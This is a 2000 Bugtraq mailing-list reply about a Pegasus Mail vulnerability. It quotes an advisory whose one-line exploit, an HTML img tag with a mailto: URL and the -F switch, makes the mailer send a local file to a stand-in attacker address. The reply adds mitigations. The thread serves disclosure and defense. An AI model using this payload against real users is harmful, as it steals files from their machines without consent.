[17045] in bugtraq
Re: Pegasus mail file reading vulnerability
daemon@ATHENA.MIT.EDU (George Bakos)
Wed Oct 4 15:03:33 2000
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7BIT
Message-Id: <200010041434.KAA08069@rowlf.vtio.org>
Date: Wed, 4 Oct 2000 10:34:05 -0400
Reply-To: George Bakos <alpinista@BIGFOOT.COM>
From: George Bakos <alpinista@BIGFOOT.COM>
X-To: Imran Ghory <ImranG@BTINTERNET.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <39DA09DB.32334.36AE40@localhost>
The temporary fix stated by Mr. Ghory affords only a brief dialog
flash. Not a very good fix. A better one is to NOT configure
Pegasus to be the default mailer for IE. This is, unfortunately a
user specified option at install time, not the default. Also, queuing
of outgoing mail allows for pre-delivery review. A pain, but until
David supplies a fix, this is it.
Be aware, the -F switch will only include a file in the body of a
message; it will NOT attach a binary. The -B switch will
accomplish this from the commandline, but not via IE. It seems
this is more of an IE mailto: implementation issue more than a
Pmail one. I wonder how many other apps you can pass
commandline options to by exploiting this "feature".
On 3 Oct 00, at 16:31, Imran Ghory wrote:
> SUMMARY
>
> The default setup of Pegasus Mail contains a remotely exploitable security
> hole that allows a remote website to gain copies of files on the users hard
> drive.
>
> DETAILS
>
> Version tested: Pegasus Mail v3.12c with IE5.0
>
> When the webpage containing the exploit code is viewed using IE5,
> Pegasus mail will automatically creates a message which has a copy
> of the file "c:\test.txt" and is addressed to "hacker@hakersite.com" and
> queues it ready to be sent without any further user intervention
>
> If instead of "hacker@hakersite.com" we have a local user,
> "hacker" the message won't be queued but just sent immediately.
>
> Exploit code:
>
> <img src="mailto:hacker@hakersite.com -F c:\test.txt">
>
> Temporary Fix:
>
> 1) Don't run Pegasus Mail at the same time as a web browser
>
> This is not a complete solution as Pegasus Mail will load up if the exploit
> code is run, but this at least will be more noticable to the user.
>
> Vendor:
>
> As I earlier posted a message to vuln-dev giving the basics of this exploit
> without the realizing the consequeces (at that stage the user had to click on
> a link for the exploit to come into play), I have decided to publish the full
> exploit before contacting the vendor.
>
> --
> Imran Ghory
>
George Bakos - Security Engineer
Electronic Warfare Associates
Information & Infrastructure Technologies
802-338-3213
To request PGP public key,
mailto:alpinista@bigfoot.com?subject=sendpubkey
or http://pgpkeys.mit.edu:11371/
